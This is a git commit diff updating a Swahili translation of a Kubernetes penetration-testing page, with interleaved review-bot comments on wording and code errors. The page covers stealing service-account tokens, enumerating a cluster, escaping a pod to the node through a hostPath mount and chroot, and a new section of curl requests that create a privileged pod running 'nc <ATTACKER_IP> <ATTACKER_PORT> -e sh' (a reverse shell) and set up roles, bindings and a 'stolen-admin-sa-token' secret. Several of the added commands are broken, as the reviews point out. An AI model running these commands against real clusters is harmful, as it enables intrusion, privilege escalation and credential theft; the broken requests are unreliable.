Translated ['src/pentesting-cloud/kubernetes-security/kubernetes-enumera

Translator
2025-01-22 09:51:26 +00:00
parent 2c0cae0424
commit 59335c9c21
2 changed files with 238 additions and 28 deletions


@@ -6,7 +6,7 @@
Ikiwa umepata ufikiaji wa mashine, mtumiaji anaweza kuwa na ufikiaji wa jukwaa la Kubernetes. Token kawaida hupatikana katika faili inayotajwa na **env var `KUBECONFIG`** au **ndani ya `~/.kube`**.
Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na API server**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.
Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na seva ya API**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.
Ikiwa umepata pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata tokens na taarifa kuhusu mazingira ya K8 ya sasa:
@@ -33,7 +33,7 @@ zina faili:
- **namespace**: Inaonyesha namespace ya sasa
- **token**: Inabeba **service token** ya pod ya sasa.
Sasa kwamba una token, unaweza kupata API server ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**
Sasa kwamba una token, unaweza kupata seva ya API ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**
Token ya akaunti ya huduma inasainiwa na funguo iliyoko katika faili **sa.key** na kuthibitishwa na **sa.pub**.
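Review bot: the command at the end of the edited line is garbled markup rather than something a reader can paste: the `**` bold markers sit inside the backticked span, so it renders as `(env | set) | grep -i "kuber|kube`**`"`**. Since this line is being touched anyway, restore it to `(env | set) | grep -i "kuber|kube"`, and note that plain `grep` treats `|` literally in a basic regex, so the alternation only works as `grep -iE "kuber|kube"` (or simply `grep -i kube`, which already matches both spellings).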
@@ -55,7 +55,7 @@ Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.
## GUI Applications
- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka kwenye terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k8slens**: Inatoa siku chache za majaribio bure: [https://k8slens.dev/](https://k8slens.dev/)
## Enumeration CheatSheet
@@ -63,12 +63,12 @@ Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.
Ili kuorodhesha mazingira ya K8s unahitaji kadhaa ya haya:
- **token halali ya uthibitishaji**. Katika sehemu iliyopita tuliona wapi pa kutafuta token ya mtumiaji na token ya akaunti ya huduma.
- **anwani (**_**https://host:port**_**) ya API ya Kubernetes**. Hii inaweza kupatikana kawaida katika variable za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha API server**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha API server, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.
- **anwani (**_**https://host:port**_**) ya API ya Kubernetes**. Hii inaweza kupatikana kawaida katika variables za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha seva ya API**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha seva ya API, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.
Kwa maelezo hayo unaweza **kuorodhesha kubernetes**. Ikiwa **API** kwa sababu fulani inapatikana kupitia **Mtandao**, unaweza tu kupakua taarifa hiyo na kuorodhesha jukwaa kutoka kwa mwenyeji wako.
Hata hivyo, kawaida **API server iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjwa ili kuweza kuifikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa API server.
Hata hivyo, kawaida **seva ya API iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjika ili kuweza kuifikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa seva ya API.
### Differences between `list` and `get` verbs
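Review bot: the retranslated ca.crt bullet still ends with "hutahitaji hii" (you will not need this) for `--insecure-skip-tls-verify` / `-k`. Since the same list tells the reader to present the service-account token as a bearer credential, it is worth one clause saying that skipping verification also disables authentication of the API server, so the token is then sent to whatever answers at the configured host:port. Suggest: "...hutahitaji hii, lakini hutakuwa unathibitisha seva unayotuma token yako."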
@@ -98,7 +98,7 @@ Wanafungua muunganisho wa mtiririko ambao unakurudishia orodha kamili ya Deploym
### Kutumia curl
Kutoka ndani ya pod unaweza kutumia vigezo kadhaa vya env:
Kutoka ndani ya pod unaweza kutumia vigezo kadhaa vya mazingira:
```bash
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
@@ -113,7 +113,7 @@ alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
### Kutumia kubectl
Kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:
Ili kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:
Kwa kawaida, APISERVER inawasiliana na muundo wa `https://`
```bash
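Review bot: the new wording "Ili kuwa na token na anwani ya seva ya API unatumia kubectl au curl..." changes the meaning from "having the token and the API server address, you use kubectl or curl to access it" to "in order to obtain the token and the address, you use kubectl or curl", which is backwards: kubectl and curl consume the token, they do not obtain it. Keep the previous "Kuwa na token na anwani ya seva ya API, unatumia kubectl au curl..." or use "Ukiwa na token na anwani ya seva ya API, unatumia ...".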
@@ -121,7 +121,7 @@ alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-
```
> ikiwa hakuna `https://` katika url, unaweza kupata Kosa Kama Ombi Mbaya.
Unaweza kupata [**cheatsheet rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio tofauti chaguzi za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.
Unaweza kupata [**karatasi ya udanganyifu rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio tofauti chaguzi za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.
Ili kupata ombi la HTTP ambalo `kubectl` inatuma unaweza kutumia parameter `-v=8`
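Review bot: "karatasi ya udanganyifu rasmi ya kubectl" renders "cheat sheet" literally as a "sheet of deception". The heading "## Enumeration CheatSheet" in this same file keeps the term as a loanword, so the link text should stay "cheatsheet rasmi ya kubectl" for consistency and so that the linked page is not described as being about cheating.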
@@ -150,7 +150,7 @@ kubectl config set-context --current --namespace=<namespace>
{{#endtab }}
{{#endtabs }}
Ikiwa umeweza kuiba baadhi ya akreditivu za watumiaji unaweza **kuziunda kwa ndani** ukitumia kitu kama:
Ikiwa umeweza kuiba akauti za watumiaji, unaweza **kuziunda kwa ndani** ukitumia kitu kama:
```bash
kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
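Review bot: replacing "akreditivu za watumiaji" (user credentials) with "akauti za watumiaji" changes the meaning. The command that follows is `kubectl config set-credentials`, which stores a stolen credential (a token or an OIDC identity) in the local kubeconfig; it does not create user accounts. "akauti" is also a misspelling of "akaunti". Suggest "Ikiwa umeweza kuiba akreditivu za baadhi ya watumiaji, unaweza **kuziunda kwa ndani** ..." or simply keeping the previous wording.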
@@ -231,7 +231,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
### Pata majina ya maeneo
Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na kundi moja la kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.
Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na klasta moja ya kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -272,7 +272,7 @@ for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f
```
### Pata Akaunti za Huduma
Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kupandisha mamlaka.
Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kwa kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kuongeza mamlaka.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -309,7 +309,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
### Pata Pods
Pods ndizo **containers** halisi ambazo zitakuwa **zinaendesha**.
Pods ni **containers** halisi ambazo zitafanya **kazi**.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -328,7 +328,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
### Pata Huduma
Kubernetes **huduma** zinatumika ku **onyesha huduma katika bandari na IP maalum** (ambayo itafanya kazi kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.
Kubernetes **huduma** zinatumika ili **kuweka huduma wazi katika bandari na IP maalum** (ambayo itakuwa kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -383,7 +383,7 @@ kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
### Pata cronjob
Cron jobs inaruhusu kupanga kutumia sintaksia kama ya crontab uzinduzi wa pod ambayo itafanya kitendo chochote.
Cron jobs inaruhusu kupanga kutumia sintaksia kama crontab uzinduzi wa pod ambayo itatekeleza kitendo chochote.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -401,7 +401,7 @@ kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
### Pata configMap
configMap daima ina habari nyingi na configfile ambazo zinatolewa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/nje.
configMap kila wakati ina habari nyingi na configfile ambazo zinatoa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/nje.
{{#tabs }}
{{#tab name="kubectl" }}
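Review bot: "configfile ambazo zinatoa kwa programu" drops the passive of the previous "zinatolewa kwa programu" (config files that are provided to the applications) and leaves "zinatoa" without an object, so the sentence no longer says who provides what to whom. The old form was correct; only "kila wakati" for "daima" is a harmless change.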
@@ -459,9 +459,13 @@ k top pod --all-namespaces
{{#endtab }}
{{#endtabs }}
## Kuingiliana na klasta bila kutumia kubectl
Kwa kuwa jukwaa la kudhibiti la Kubernetes linaonyesha API ya REST-ful, unaweza kuunda maombi ya HTTP kwa mikono na kuyatumia na zana nyingine, kama **curl** au **wget**.
### Kutoroka kutoka kwa pod
Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, badilisha kwenda kwenye pod iliyoundwa kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, kubadilisha kwenda kwenye pod iliyoundwa na kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
@@ -501,7 +505,7 @@ restartPolicy: Never
# or using
# node-role.kubernetes.io/master: ""
```
Baada ya hapo unaunda pod.
Baada ya hapo unaunda podi
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
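Review bot: "Baada ya hapo unaunda podi" drops the full stop and introduces the spelling "podi" while the rest of the file, including the neighbouring sentences ("kubadilisha kwenda kwenye pod iliyoundwa", "attacker-pod"), uses "pod". Keep "Baada ya hapo unaunda pod."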
@@ -509,13 +513,219 @@ Sasa unaweza kubadilisha kwenda kwenye pod iliyoundwa kama ifuatavyo
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
```
Na hatimaye unachora chroot ndani ya mfumo wa node.
Na hatimaye unachroot ndani ya mfumo wa node.
```bash
chroot /root /bin/bash
```
Taarifa zilizopatikana kutoka: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## Marejeo
### Kuunda pod yenye mamlaka
Faili la yaml linalolingana ni kama ifuatavyo:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed-exec-pod
labels:
app: pentest
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed-pod
image: alpine
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "nc <ATTACKER_IP> <ATTACKER_PORT> -e sh" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
volumes:
- name: noderoot
hostPath:
path: /
```
Unda pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 478' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc <ATTACKER_IP> <ATTACKER_PORT> -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa pod
Futa pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
POD_NAME="everything-allowed-exec-pod"
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
```
### Unda Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Length: 109' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
SA_NAME=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
```
### Unda Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 203' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
```
### Unda Kifungo cha Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 816' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Mkataba wa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_BINDING_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 219' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
SECRET_NAME=""
ccurl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
```
## Marejeleo
{{#ref}}
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
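Review bot: several of the new curl sections fail as written. In "Futa Jukumu" the URL is `https://$$CONTROL_PLANE_HOST/...`; `$$` expands to the shell's PID, so the host is wrong. In "Unda Kifungo cha Jukumu" the path `/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings` and in the first "Futa Siri" the path `/api/v1/$NAMESPACE/default/secrets` are both missing the `namespaces/` segment and carry a stray `default` element; they should be `/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings` and `/api/v1/namespaces/$NAMESPACE/secrets`, matching the delete requests that follow them. The last block starts with `ccurl` instead of `curl`. Every request also pins a literal `Content-Length` (478, 109, 203, 816, 219, 35) copied from a capture; curl derives that header from `--data-binary` on its own, and as soon as a reader substitutes `<ATTACKER_IP>`, a name or a namespace, the pinned value no longer matches the body and the API server either waits for bytes that never arrive or parses a truncated body, so those headers (and the pasted kubectl `User-Agent`) should be dropped. Content-wise, the RoleBinding subject is `secrets-manager-sa` while the ServiceAccount created in "Unda Akaunti ya Huduma" is `secrets-manager-sa-2`, so the binding as written grants nothing to the account just created. The heading above the POST that creates a Secret reads "### Futa Siri" (delete), identical to the section after it, and should be "### Unda Siri"; RoleBinding is rendered as "Kifungo cha Jukumu" in one heading and "Mkataba wa Jukumu" in the next; and the attribution line now reads "Information obtained from: ..." in place of the previously translated "Taarifa zilizopatikana kutoka: ...", leaving an untranslated sentence in a translated file.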